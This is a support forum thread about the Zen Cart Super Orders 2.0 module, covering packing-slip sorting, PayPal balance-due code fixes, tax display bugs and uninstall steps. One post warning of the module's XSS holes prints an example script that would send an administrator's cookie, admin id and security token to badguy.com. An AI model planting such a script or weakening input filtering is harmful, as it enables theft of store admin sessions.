OLD Super Orders 2.0 (See v3.0 thread instead)

[philip_clarke]

First thing SSL in admin will do nothing for the case you mentioned if you have not moved the admin folder. Please read the security guidelines in http://YOUR_WEBISTE_ADDRESS/docs/imp...endations.html

All of super orders is full of security holes because there is no filtering of $_GET or $_POST. At somepoint ZC introduced basic filtering on $_GET in the file admin/includes/init_includes/init_general_funcs.php and this has stopped super_orders from working in the one arear that you mentioned. If you wish to edit that file as mentioned above, then the bug will disappear, but you will have a larger hole.

The hole is an XSS or SQL injection one, but would only be usable if someone knew the location of your admin folder and possibly if they could log on (although they may be able to steal a session by sniffing the cookie or session variable if you are not using SSL for admin). If they stole your session variable then they could do anything with your database that they liked but if they stole your session, they could easily apply a SQL patch and do the same thing.

The risk is low but if you wish to edit the the file I mentioned then the whole rest of your admin area will also be open to possible SQL Injection or XSS attacks because if you are opening it in that function to fix that bug then you will expose the whole of administration.

[brettw]

Hi All,

A quick question in regards to sorting alphabetically in the super packing slip.

I had a look back through the thread and there is a few questions about sorting the products on the packing slip alphabetically however there does not seem to be any replies.

Can someone point me in the right direction of where I need to edit the packing slip code to sort the array of products.

Thanks in advance
Brett

[philip_clarke]

Short answer is no, you cannot order the objecs in a packing slip alphabetically unless you write a new function to sort the products out.

The products are not stored in a SQL statement that can be ordered, they are stored in a fixed object array like below

Code:

Array
(
    [0] => Array
        (
            [qty] => 1
            [id] => 111
            [name] => TEST $120 Special $90.00 Sale -$5.00 Skip
            [model] => Test120-90-5SKIP
            [tax] => 0.0000
            [price] => 90.0000
            [onetime_charges] => 0.0000
            [final_price] => 120.0000
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Size
                            [value] => X-Small
                            [prefix] => +
                            [price] => 40.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

    [1] => Array
        (
            [qty] => 1
            [id] => 1
            [name] => Matrox G200 MMS
            [model] => MG200MMS
            [tax] => 0.0000
            [price] => 299.9900
            [onetime_charges] => 0.0000
            [final_price] => 299.9900
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Model
                            [value] => Value
                            [prefix] => +
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                    [1] => Array
                        (
                            [option] => Memory
                            [value] => 4 mb
                            [prefix] => 
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

    [2] => Array
        (
            [qty] => 1
            [id] => 1
            [name] => Matrox G200 MMS
            [model] => MG200MMS
            [tax] => 0.0000
            [price] => 299.9900
            [onetime_charges] => 0.0000
            [final_price] => 469.9900
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Model
                            [value] => Premium
                            [prefix] => +
                            [price] => 100.0000
                            [product_attribute_is_free] => 0
                        )

                    [1] => Array
                        (
                            [option] => Memory
                            [value] => 16 mb
                            [prefix] => +
                            [price] => 70.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

    [3] => Array
        (
            [qty] => 1
            [id] => 1
            [name] => Matrox G200 MMS
            [model] => MG200MMS
            [tax] => 0.0000
            [price] => 299.9900
            [onetime_charges] => 0.0000
            [final_price] => 299.9900
            [product_is_free] => 0
            [attributes] => Array
                (
                    [0] => Array
                        (
                            [option] => Model
                            [value] => Value
                            [prefix] => +
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                    [1] => Array
                        (
                            [option] => Memory
                            [value] => 4 mb
                            [prefix] => 
                            [price] => 0.0000
                            [product_attribute_is_free] => 0
                        )

                )

        )

)

which is from the examples shipped with zen-cart. One would need to write a new function to take the $order->products object, put in a temp object, resort it on the name attribute and then pop it back into the code.

[smatric]

Hi all,

I started to cooperate with HiPCTech. We use for our webstore Zen Cart with Super Orders module. We had a problem with "Balance Due". If someone paid through PayPal, Super Orders still showed "Balance Due" to be paid. I've found a solution to this problem and I'd like to post it here so that maybe someone can also find it useful.

Whole changes are made in "zcmanager/includes/classes/super_order.php". I modified "start()" function and added one new ("check_paypal_payments()"). What it does is it basically selects PayPal payments from "TABLE_PAYPAL" where order_id equals "$this->oID" and adds "mc_gross" value to "amount_applied". It takes only payments from "paypalwpp" or "paypal 1.3.8a" or "paypal (ipn-handler)" modules. There might be a better way to do it. Maybe just to select all except for "paypaldp". But for security I wrote it like that.

We've just notice another "Balance Due problem". I'd like to share with you my solution hoping it might be useful for somebody.

The problem was with PayPal payments in foreign currencies. The total order amount is not being multiplied by currency value resulting in lover value and in negative value of balance due. (We use Super Orders by Frank Koehl written on "27 2006-02-03 20:06:12".)

Here is a proposed solution:

in zcmanager/includes/classes/super_order.php replace line:

Code:

    	$this->order_total = $order_query->fields['order_total'];

with:

Code:

    if($order_query->fields['payment_method'] == 'PayPal') {
    	$this->order_total = round($order_query->fields['currency_value'] * $order_query->fields['order_total'], 2);
    }
    else {
    	$this->order_total = $order_query->fields['order_total'];
    }

[philip_clarke]

What I think is that super orders is in desperate need to be brought up to date, the orders.php dates back to early 2006, and there are multiple uses of unfiltered $_GET values as well as displaying values striaght out of the db, without filtering the content e.g. someone puts in a memo field

Code:

<script>document.images[0].src=http://badguy.com?document.cookie+' '+zenAdminId+' '+securityToken</script>

That's just a theoretical example, it doesn't work but if an administrator were to look at a COD order then it would secretly post the administrator's session information through to badguy.com, super orders is littered with XSS vulnerabilities. I may have time in a few weeks, but really there needs to be a fulltime volunteer. (I already maintain a couple of modules).

Philip.

[Zinfandel]

Hi All,

A quick question in regards to sorting alphabetically in the super packing slip.

I had a look back through the thread and there is a few questions about sorting the products on the packing slip alphabetically however there does not seem to be any replies.

Can someone point me in the right direction of where I need to edit the packing slip code to sort the array of products.

Thanks in advance
Brett

Hello Brett,
If I'm not mistaken, the array of products is populated based on the results of an SQL query. If you can find it, and modify the ORDER BY clause, you will be able to influence the order of the array and therefore your packing slip. However, this will be the order of all resulting arrays that use the same query.

[philip_clarke]

You are mistaken, the order is populated by a sql query that stores the shopping cart before a purchase has even gone through the checkout, that way when a product is deleted from the store, the invoice still has the products on it (legal requirement).

[hc1501]

My super order is creating a problem with my payment gateway module. I want it removed.. Please anyone help...

[rleepac]

Hello

I ahve a site running Super Orders and I have encountered some problems where the Tax is not displayed in the tax colomn of the Super Invoice even though the product is taxable.

Products Model Tax Unit Price Total
1 x ANT
- Size: 12 (0111089120) 0111089 None! £11.02 £11.02


The unite price is correct but then the Total column is incorrect as it doesn't add the tax either...

However the Sub-Total value does take into account the TAX and displays correctly...

Can anyone shed any light?

Thanks

Andy

Did you figure this out or get an answer to this? I'm having the same problem. The total is right but under the tax column it just shows "none!"

Anyone?

[philip_clarke]

It would be helpful if you could post to the forum which gateway it is, so that other people could become aware of any potential problems.

Reverse any changes you made when you followed the installation instructions. The easiest way to do this is to download a copy of ZC and take the files

includes/classes/order.php
admin/includes/classes/order.php
admin/includes/general.js

and upload them to your server overwriting the ones you my have edited.

This is the full list of php files in the zip that could be affecting things:

Code:

./catalog/admin/super_batch_status.php
./catalog/admin/super_edit.php
./catalog/admin/super_orders.php
./catalog/admin/super_report_await_pay.php
./catalog/admin/super_packingslip.php
./catalog/admin/super_shipping_label.php
./catalog/admin/super_customers.php
./catalog/admin/super_report_cash.php
./catalog/admin/super_invoice.php
./catalog/admin/super_payment_types.php
./catalog/admin/super_payments.php
./catalog/admin/includes/languages/english/super_batch_status.php
./catalog/admin/includes/languages/english/super_edit.php
./catalog/admin/includes/languages/english/super_orders.php
./catalog/admin/includes/languages/english/super_report_await_pay.php
./catalog/admin/includes/languages/english/super_packingslip.php
./catalog/admin/includes/languages/english/super_customers.php
./catalog/admin/includes/languages/english/super_report_cash.php
./catalog/admin/includes/languages/english/super_invoice.php
./catalog/admin/includes/languages/english/super_payment_types.php
./catalog/admin/includes/languages/english/super_payments.php
./catalog/admin/includes/languages/english/super_data_sheet.php
./catalog/admin/includes/languages/english/super_batch_forms.php
./catalog/admin/includes/languages/english/order_status_email.php
./catalog/admin/includes/boxes/extra_boxes/super_orders_localization_dhtml.php
./catalog/admin/includes/boxes/extra_boxes/super_orders_reports_dhtml.php
./catalog/admin/includes/boxes/extra_boxes/super_orders_customers_dhtml.php
./catalog/admin/includes/extra_datafiles/super_orders_defines.php
./catalog/admin/includes/functions/extra_functions/super_orders_functions.php
./catalog/admin/includes/classes/popup.php
./catalog/admin/includes/classes/customer.php
./catalog/admin/includes/classes/super_order.php
./catalog/admin/super_data_sheet.php
./catalog/admin/super_batch_forms.php
./catalog/includes/languages/english/modules/payment/purchaseorder.php
./catalog/includes/extra_datafiles/super_orders_defines.php
./catalog/includes/modules/payment/purchaseorder.php
./catalog/includes/classes/super_order.php
./_upgrade/super_upgrade.php

remove the ones under includes first (these ones)

Code:

includes/languages/english/modules/payment/purchaseorder.php
includes/extra_datafiles/super_orders_defines.php
includes/modules/payment/purchaseorder.php
includes/classes/super_order.php

Philip.